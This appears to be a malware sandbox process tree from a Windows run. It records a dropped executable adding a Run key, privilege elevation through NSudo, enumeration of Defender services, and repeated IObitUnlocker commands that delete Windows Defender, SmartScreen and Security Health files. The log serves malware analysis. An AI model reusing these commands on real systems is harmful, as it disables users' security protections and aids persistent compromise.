C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4580,i,12861916850798997527,13256094876139057129,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4532 /prefetch:19⤵
- Uses browser remote debugging
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10480910101\DgQBvwg.exe"C:\Users\Admin\AppData\Local\Temp\10480910101\DgQBvwg.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iwjdaof2\iwjdaof2.cmdline"7⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA860.tmp" "c:\Users\Admin\AppData\Local\Temp\iwjdaof2\CSCEC4EEAFDD80849C0A163DFBF451FC780.TMP"8⤵
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10481850271\ArFLIYD.msi" /quiet6⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\10482110101\234211e288.exe"C:\Users\Admin\AppData\Local\Temp\10482110101\234211e288.exe"6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\11.bat" "7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\11.bat" any_word8⤵
-
C:\Windows\SysWOW64\chcp.comchcp 650019⤵
-
-
C:\Windows\SysWOW64\reg.exereg query "HKU\S-1-5-19"9⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize" /v "AppsUseLightTheme" /t reg_dword /d 0 /f9⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Work\NSudoLG.exeNSudoLG -U:T -P:E -UseCurrentConsole C:\Users\Admin\AppData\Local\Temp\11.bat9⤵
-
-
C:\Windows\SysWOW64\mode.comMode 79,499⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ver9⤵
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA"9⤵
-
-
C:\Windows\SysWOW64\find.exefind /i "0x0"9⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tasklist9⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist10⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\System\CurrentControlSet\Services\WinDefend"9⤵
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\System\CurrentControlSet\Services\MDCoreSvc"9⤵
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\System\CurrentControlSet\Services\WdNisSvc"9⤵
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\System\CurrentControlSet\Services\Sense"9⤵
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\System\CurrentControlSet\Services\wscsvc"9⤵
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\System\CurrentControlSet\Services\SgrmBroker"9⤵
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\System\CurrentControlSet\Services\SecurityHealthService"9⤵
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\System\CurrentControlSet\Services\webthreatdefsvc"9⤵
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\System\CurrentControlSet\Services\webthreatdefusersvc"9⤵
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\System\CurrentControlSet\Services\WdNisDrv"9⤵
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\System\CurrentControlSet\Services\WdBoot"9⤵
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\System\CurrentControlSet\Services\WdFilter"9⤵
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\System\CurrentControlSet\Services\SgrmAgent"9⤵
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\System\CurrentControlSet\Services\MsSecWfp"9⤵
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\System\CurrentControlSet\Services\MsSecFlt"9⤵
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\System\CurrentControlSet\Services\MsSecCore"9⤵
-
-
C:\Windows\SysWOW64\reg.exereg query HKLM\System\CurrentControlset\Services\WdFilter9⤵
- Modifies registry key
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v "ProductName"9⤵
-
-
C:\Windows\SysWOW64\find.exefind /i "Windows 7"9⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ver "9⤵
-
-
C:\Windows\SysWOW64\findstr.exefindstr /c:"6.1.7601"9⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Work\7z.exe7z x -aoa -bso0 -bsp1 "DKTolz.zip" -p"DDK" "Unlocker.exe"9⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exeUnlocker /currentDiskSize9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc query IObitUnlocker10⤵
-
C:\Windows\system32\sc.exesc query IObitUnlocker11⤵
- Launches sc.exe
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /pid "5444"10⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /pid "5444"11⤵
- Kills process with taskkill
-
-
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\Software\Microsoft\Windows Advanced Threat Protection"9⤵
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC"9⤵
-
-
C:\Windows\SysWOW64\reg.exereg query "HKCR\Directory\shellex\ContextMenuHandlers\EPP"9⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exeUnlocker /dеlwd9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc query IObitUnlocker10⤵
-
C:\Windows\system32\sc.exesc query IObitUnlocker11⤵
- Launches sc.exe
-
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"10⤵
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"10⤵
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"10⤵
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"10⤵
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"10⤵
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"10⤵
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"10⤵
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"10⤵
-
-
